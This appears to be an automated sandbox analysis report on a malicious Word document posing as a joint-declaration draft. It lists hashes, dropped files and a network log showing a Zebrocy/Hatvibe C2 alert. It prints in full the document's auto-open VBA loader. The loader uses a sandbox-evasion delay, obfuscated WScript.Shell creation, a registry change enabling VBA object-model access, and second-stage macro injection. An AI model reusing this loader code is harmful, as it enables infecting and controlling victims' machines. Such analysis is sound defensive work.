                        SHA1:69B8465D2678615742794C507F69DB28A462D7FD
                        SHA-256:1605D2FF3197A3864FA48301EBD5420AD41010F6015483F4290097ED1B586B27
                        SHA-512:DD3D77AD27771DD71710DBB703C60C9E8BA62193620B44E0A30CB91DD24AF7D54B871300EC6BCC6150B9D2C4F6C4434E4B17C0AAA8CA9EEEFD8C485B487F7A90
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.912478106217372
                        Encrypted:false
                        SSDEEP:3:EIXl+PWlllw/7lEUl6vlKN3XfAn8B14xKn:lzl/w/PXpn
                        MD5:388BCC0C7DFDCD7C93D94D8D66FF7E77
                        SHA1:50AE43A49A9CFFAE317DB76776375EF0B6643AB0
                        SHA-256:E02F6A704E4AF780B3EFBB45C165D962FF1268EDCAC58E427133DBECB64991AD
                        SHA-512:B8BA0097118DD1D6887019C3F726493A920CDBAAC48885820D319ABAB77900634CA13C1082857710A0FC7967F979CF09EF5B3333AF476304AC1F743683A71EA1
                        Malicious:false
                        Preview:.user..................................................G.a.n.j.i.....`..Z$...@;//w...@;//w....W.......................W.........r.e...h.3....&M.r.e..........6...
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):22282
                        Entropy (8bit):7.5936605339775936
                        Encrypted:false
                        SSDEEP:384:/iYDt8HMzXvFx1GSNxt/ZtNNjF39fTaK4D+nfS7isXM9Q4kvaQvGaQad:/NG89x1txllNjFNX4D6SY92HtL
                        MD5:64F9FC5C386C100FC6BFAFB4EA6391ED
                        SHA1:A1E313C4CAF8EC5969EA707D9FA359270320BD7E
                        SHA-256:1C040D539F41F088B0E1E8B2B9582D0D3677FD2C65455568D133C55684D3B231
                        SHA-512:AF96D6FCA0A2B4DB69872E8DC45CDBA90620D0B39F6624D7561CEC593B8489461B20AF3F8C582EE9CE9F9DCC88BCAEEF078FBEF60041AC66AA0FBFE16C1B5472
                        Malicious:false
                        Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):27365
                        Entropy (8bit):7.695762935056973
                        Encrypted:false
                        SSDEEP:384:/iYDtx5ldxurohRPdPhn6OxH1++Nxt/ZtNNj139fTaK4D+nfS7iM9Q4kvaQxTUpi:/Nx5lmr0NhnxHoUxllNj1NX4D6Sz92SA
                        MD5:7F6DCEB8F8F61A5E1A0AF4DDA8009BCC
                        SHA1:96EDEA1E542C910AD97A5A330BE83CAF3EE6829C
                        SHA-256:D3DCF44DA5B295EAF01919536DA29FFAC68B8FC7735B85DABA1144B94FF142E3
                        SHA-512:A58807C2CC8BBA61A20463CD9AE21EC86B247D8206609BB0FE260FBE74F08D9C96A90D811B8ACCE023AA23113B0B6EF0801E55488A1BD9CE2554AA841651A159
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):22282
                        Entropy (8bit):7.5936605339775936
                        Encrypted:false
                        SSDEEP:384:/iYDt8HMzXvFx1GSNxt/ZtNNjF39fTaK4D+nfS7isXM9Q4kvaQvGaQad:/NG89x1txllNjFNX4D6SY92HtL
                        MD5:64F9FC5C386C100FC6BFAFB4EA6391ED
                        SHA1:A1E313C4CAF8EC5969EA707D9FA359270320BD7E
                        SHA-256:1C040D539F41F088B0E1E8B2B9582D0D3677FD2C65455568D133C55684D3B231
                        SHA-512:AF96D6FCA0A2B4DB69872E8DC45CDBA90620D0B39F6624D7561CEC593B8489461B20AF3F8C582EE9CE9F9DCC88BCAEEF078FBEF60041AC66AA0FBFE16C1B5472
                        Malicious:false
                        Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):56659
                        Entropy (8bit):7.8358614564190425
                        Encrypted:false
                        SSDEEP:768:Dtn0S1ew5SXju6CvNxyhaWqx/hIyGBPCq7PSiwsIH762oDWDLmPbyLZymm11zpcx:DV0vwAX/CvaYWMiySPSPHNDSOFyBi
                        MD5:450C854353108E15BD86C6A447454200
                        SHA1:77256F019E37A589BE7DADEDEF1996D9F260CE12
                        SHA-256:2CE4DCEB4CB15F5673864A0D93AF6BC608004E305D37610E92BEB7F94916DE23
                        SHA-512:432CE44C8C679933ACBE57375C23E50EBE2417778D52506A819FB29BADD857308A09DB79C543333284F829AE1E8E6200EF35627533420B1C751AA2C611596534
                        Malicious:true
                        Preview:PK..........!...=.....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................K..0.F.H...[....!.t.. ....$..}........s....&P.....|.vb{}.h...!jgKvU.X.V:..d_.?.oY.QX%.g.dG..z......!fTmc.v....Q...X8..Zj..@z.[..!.._.Vo.t..b.-.m.7P.}...#..T..}..*...R 5.U....k-.8T.... ..ga..8C{.....Uv}.N...:.Hh[N..u.i..V......^.....{C..y.0..J....ZQ5@.B...d.M.@..aC.9..Gt.i.F0..>^-H.m.....6A[...0...... ..{qz...I..p.)&..D.c.......x@.....yV.../.,~....u.b5&...X..a$.*HgZB....X..7.mW.T..J.U.!......p....D.^..$.....
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.9078183068213024
                        Encrypted:false
                        SSDEEP:3:EIXl+PWlllmsl7ldlKtnlcX9AellSxKn:lzl/XldlK0Nx//n
                        MD5:FEEC8DEA0F7C4686BF4430B2864818E4
                        SHA1:1179FA7F95F64A56C9657C3D5FFD2354CDC32F2C
                        SHA-256:3413D85FEB733A3287B67CEF60A7A6D33F665451C518697BD5259223B785A031
                        SHA-512:AEC6BB71A5696FCC7737913B1F5CE2A63DC3C29262BC89E6BDDDC864FEC438FD1CDEB30CAACA54E344F46D936B217BA540B38D8B50427B20C33E4D4914EE801B
                        Malicious:false
                        Preview:.user..................................................G.a.n.j.i.....`........<.......<........................................Hb.e..P....P...f.d.e..........6...
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):56659
                        Entropy (8bit):7.8358614564190425
                        Encrypted:false
                        SSDEEP:768:Dtn0S1ew5SXju6CvNxyhaWqx/hIyGBPCq7PSiwsIH762oDWDLmPbyLZymm11zpcx:DV0vwAX/CvaYWMiySPSPHNDSOFyBi
                        MD5:450C854353108E15BD86C6A447454200
                        SHA1:77256F019E37A589BE7DADEDEF1996D9F260CE12
                        SHA-256:2CE4DCEB4CB15F5673864A0D93AF6BC608004E305D37610E92BEB7F94916DE23
                        SHA-512:432CE44C8C679933ACBE57375C23E50EBE2417778D52506A819FB29BADD857308A09DB79C543333284F829AE1E8E6200EF35627533420B1C751AA2C611596534
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:PK..........!...=.....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................K..0.F.H...[....!.t.. ....$..}........s....&P.....|.vb{}.h...!jgKvU.X.V:..d_.?.oY.QX%.g.dG..z......!fTmc.v....Q...X8..Zj..@z.[..!.._.Vo.t..b.-.m.7P.}...#..T..}..*...R 5.U....k-.8T.... ..ga..8C{.....Uv}.N...:.Hh[N..u.i..V......^.....{C..y.0..J....ZQ5@.B...d.M.@..aC.9..Gt.i.F0..>^-H.m.....6A[...0...... ..{qz...I..p.)&..D.c.......x@.....yV.../.,~....u.b5&...X..a$.*HgZB....X..7.mW.T..J.U.!......p....D.^..$.....
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:Microsoft Word 2007+
                        Entropy (8bit):7.9707357623815644
                        TrID:
                        • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
                        • Word Microsoft Office Open XML Format document (49504/1) 36.13%
                        • Word Microsoft Office Open XML Format document (27504/1) 20.07%
                        • ZIP compressed archive (8000/1) 5.84%
                        File name:Rev5_ Joint Declaration C5 GER_track changes.doc
                        File size:56'429 bytes
                        MD5:a15e652cf058209c0c0040dfcaf86fec
                        SHA1:0f162082585615212dd8a3fce41944a9a04c5a21
                        SHA256:47092548660d5200ea368aacbfe03435c88b6674b0975bb87a124736052bd7c3
                        SHA512:07324f0765679c73c2cb18774356bbc9baa7d2a1b045332081e54604692e08e93219b4b743e081810cdd1630ddcf35473749f4f6b8ad971a460212f23d8b3980
                        SSDEEP:1536:S/qgy7rV76z1EsSzQMXnkM8QvYIStgpAt4kD6g:bhyAQMXkM7nEgpAt4kDj
                        TLSH:1743F12AD6B76CF0D81F4FB30E532E08F62A86B1DB592282219471DCD4C19F16D5F49E
                        File Content Preview:PK.........x-Y..=.....].......[Content_Types].xml...n.0.E.......D'..(,g..@6m..@..9.....c'......&1.8....9...H./.L.. D.l......J..]......#."..D.,.l..]...[..=...m,.....<.......RK...H.a........b..Kg.,..2.jy...6.]?...I.-.>........-.R3.YU.......]%n..............
                        Icon Hash:35e1cc889a8a8599
                        Document Type:OpenXML
                        Number of OLE Files:1
                        Has Summary Info:
                        Application Name:
                        Encrypted Document:False
                        Contains Word Document Stream:True
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:False
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Title:
                        Author:
                        Template:Normal.dotm
                        Last Saved By:
                        Revision Number:1
                        Total Edit Time:0
                        Create Time:2024-09-13T09:10:00Z
                        Last Saved Time:2024-09-13T09:15:00Z
                        Number of Pages:4
                        Number of Words:1662
                        Number of Characters:9477
                        Creating Application:Microsoft Office Word
                        Security:12
                        Number of Lines:78
                        Number of Paragraphs:22
                        Thumbnail Scaling Desired:false
                        Company:
                        Contains Dirty Links:false
                        Shared Document:false
                        Changed Hyperlinks:false
                        Application Version:16.0000
                        General
                        Stream Path:VBA/ThisDocument
                        VBA File Name:ThisDocument.cls
                        Stream Size:5829
                        Data ASCII:. . . . . . . . . l . . . . . . b . . . . . . . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . U e M y } u . * J . L _ \\ a . i . . . . . . . . . . . . . . . . . . . . N : W . : D D . : y W 4 . . . . . . . . . . . . . . . . . . . . . . x . . . . N : W . : D D . : y W 4 a . U e M y . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . .
                        Data Raw:01 16 03 00 06 00 01 00 00 6c 0a 00 00 e4 00 00 00 62 02 00 00 84 0b 00 00 92 0b 00 00 56 12 00 00 03 00 00 00 01 00 00 00 f9 85 91 97 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff a0 00 ff ff 00 00 ad eb 61 83 09 55 65 4d be ac 99 79 f7 b7 e7 de 7d 75 99 07 2a 4a 15 4c 90 5f 5c 61 be 1a b0 69 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Attribute VB_Name = "ThisDocument"
                        Attribute VB_Base = "1Normal.ThisDocument"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = True
                        Attribute VB_Customizable = True
                        Public objApp, wsl
                        ' Returns the text stored in the document variable "s2" (the second-stage macro source)
                        Function danger()
                            danger = ActiveDocument.Variables.Item("s2")
                        End Function
                        ' Opens the named document in the hidden Word instance, saves it and closes it
                        Function rundoc(namedoc)
                            Set doc2 = objApp.Documents.Open(namedoc)
                            doc2.Save
                            doc2.Close
                        End Function
                        ' Assembles the "WScript.Shell" ProgID from string fragments and sets
                        ' HKCU\Software\Microsoft\Office\<version>\Word\Security\AccessVBOM = 1
                        Sub verydanger()
                            strng = "WSc" & "ript.She"
                            strng = strng & "ll"
                            Set wsl = CreateObject(strng)
                            wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
                        End Sub
                        ' Auto-executes when the document is opened
                        Sub documeNt_opEn()
                            On Error Resume Next
                            ' Remove document protection and delete the shapes laid over the page content
                            ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
                            For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
                                ActiveDocument.Shapes(i).Delete
                            Next i
                            ActiveDocument.Save
                            ' Busy-wait for 20 seconds; abort if fewer than 15 seconds actually elapsed
                            sss = Now()
                            While Now < sss + TimeValue("00:00:20")
                                DoEvents
                            Wend
                            If Now() - sss < TimeValue("00:00:15") Then Exit Sub
                            verydanger
                            ' Start a hidden second Word instance with a new, empty document
                            Set objApp = CreateObject("Word.Application")
                            objApp.Visible = False
                            Set doc = objApp.Documents.Add
                            ' Copy every document variable of this document into the new one
                            For Each vars In ActiveDocument.Variables
                                doc.Variables.Add vars.Name & "ergegdr", vars
                                i = i + 1
                            Next
                            ' Inject the source from variable "s2" into the new document's VBA project (needs AccessVBOM)
                            doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
                            ' Save it under %LOCALAPPDATA%\Temp as a macro-enabled document (format 13) and open it
                            tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
                            doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
                            doc.Close
                            rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
                            objApp.Quit False
                        End Sub
                        

                        General
                        Stream Path:PROJECT
                        CLSID:
                        File Type:ASCII text, with CRLF line terminators
                        Stream Size:438
                        Entropy:5.156275738049758
                        Base64 Encoded:True
                        Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 5 8 7 2 9 B 6 2 B 3 F 2 F 3 F 2 F 3 A 3 4 3 A 3 4 " . . D P B = " 0 A 0 8 A 6 3 1 3 6 4 E 3 6 4 E C 9 B 2 3 7 4 E E 8 8 C 4 B 4 6 8 E A 9 4 7 D B E 7 C 5 D C 7 E 2 F 1 A 9 5 6 5 D
                        Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                        General
                        Stream Path:PROJECTwm
                        CLSID:
                        File Type:data
                        Stream Size:41
                        Entropy:3.0773844850752607
                        Base64 Encoded:False
                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                        General
                        Stream Path:VBA/_VBA_PROJECT
                        CLSID:
                        File Type:data
                        Stream Size:3247
                        Entropy:4.532403418826159
                        Base64 Encoded:False
                        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                        General
                        Stream Path:VBA/__SRP_0
                        CLSID:
                        File Type:data
                        Stream Size:3529
                        Entropy:3.4180952316532593
                        Base64 Encoded:False
                        Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ 6 . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . .
                        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                        General
                        Stream Path:VBA/__SRP_1
                        CLSID:
                        File Type:data
                        Stream Size:238
                        Entropy:2.11560831315699
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o b j A p p . . . . . . . . . . . . . . . . w s l . . . . . . . . . . . . . . . . n a m e d o c V . . . . . . . . . . . . . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
                        General
                        Stream Path:VBA/__SRP_2
                        CLSID:
                        File Type:data
                        Stream Size:3577
                        Entropy:3.725282825620112
                        Base64 Encoded:False
                        Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . / . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 2f 00 00 00 61 0a 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 81 0d 00 00 00 00 00 00 00 00
                        General
                        Stream Path:VBA/__SRP_3
                        CLSID:
                        File Type:data
                        Stream Size:420
                        Entropy:2.3674153773884705
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . 1 . . . . . . . . . . . O . P . 1 . . . . . . . . . . . . . . ` . . 9 . . . . . 1 . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . A . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . I . 8 . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . @ . . . . . . ` . . . * . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 a8 00 00 00 08 00 40 00 21 03 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 31 0e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                        General
                        Stream Path:VBA/dir
                        CLSID:
                        File Type:VAX-order 68k Blit mpx/mux executable
                        Stream Size:522
                        Entropy:6.206794728607764
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . ! 8 h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . ) . . . * . \\ C . . . . . . . \\ K . . . . . r . . . & O . f f i c
                        Data Raw:01 06 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 21 38 f2 68 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                        Timestamp                        SID      Signature                                                 Severity  Source IP    Source Port  Dest IP       Dest Port  Protocol
                        2025-01-13T21:33:51.571617+0100  2057742  ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M1  1         2.58.15.158  80           192.168.2.26  59240      TCP
                        Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                        Jan 13, 2025 21:33:03.449666023 CET  49676        443        192.168.2.26    52.182.143.209
                        Jan 13, 2025 21:33:05.855942011 CET  49676        443        192.168.2.26    52.182.143.209
                        Jan 13, 2025 21:33:09.199670076 CET  49675        443        192.168.2.26    2.16.158.35
                        Jan 13, 2025 21:33:10.668406963 CET  49676        443        192.168.2.26    52.182.143.209
                        Jan 13, 2025 21:33:20.277906895 CET  49676        443        192.168.2.26    52.182.143.209
                        Jan 13, 2025 21:33:29.950927019 CET  49677        443        192.168.2.26    204.79.197.203
                        Jan 13, 2025 21:33:30.314644098 CET  49677        443        192.168.2.26    204.79.197.203
                        Jan 13, 2025 21:33:31.040318966 CET  49677        443        192.168.2.26    204.79.197.203
                        Jan 13, 2025 21:33:32.294071913 CET  49677        443        192.168.2.26    204.79.197.203
                        Jan 13, 2025 21:33:34.794061899 CET  49677        443        192.168.2.26    204.79.197.203
                        Jan 13, 2025 21:33:38.739130974 CET  59224        53         192.168.2.26    162.159.36.2
                        Jan 13, 2025 21:33:38.744335890 CET  53           59224      162.159.36.2    192.168.2.26
                        Jan 13, 2025 21:33:38.744604111 CET  59224        53         192.168.2.26    162.159.36.2
                        Jan 13, 2025 21:33:38.749490976 CET  53           59224      162.159.36.2    192.168.2.26
                        Jan 13, 2025 21:33:39.189436913 CET  59224        53         192.168.2.26    162.159.36.2
                        Jan 13, 2025 21:33:39.194377899 CET  53           59224      162.159.36.2    192.168.2.26
                        Jan 13, 2025 21:33:39.194466114 CET  59224        53         192.168.2.26    162.159.36.2
                        Jan 13, 2025 21:33:39.606570959 CET  49677        443        192.168.2.26    204.79.197.203
                        Jan 13, 2025 21:33:49.211407900 CET  49677        443        192.168.2.26    204.79.197.203
                        Jan 13, 2025 21:33:50.759020090 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:33:50.763972998 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:50.764064074 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:33:50.764348030 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:33:50.764658928 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:33:50.769119024 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:50.769455910 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:51.382364988 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:51.382438898 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:33:51.412499905 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:33:51.412691116 CET  59240        80         192.168.2.26    2.58.15.158
                        Jan 13, 2025 21:33:51.571616888 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:51.571641922 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:51.743153095 CET  80           59240      2.58.15.158     192.168.2.26
                        Jan 13, 2025 21:33:51.743221998 CET  59240        80         192.168.2.26    2.58.15.158
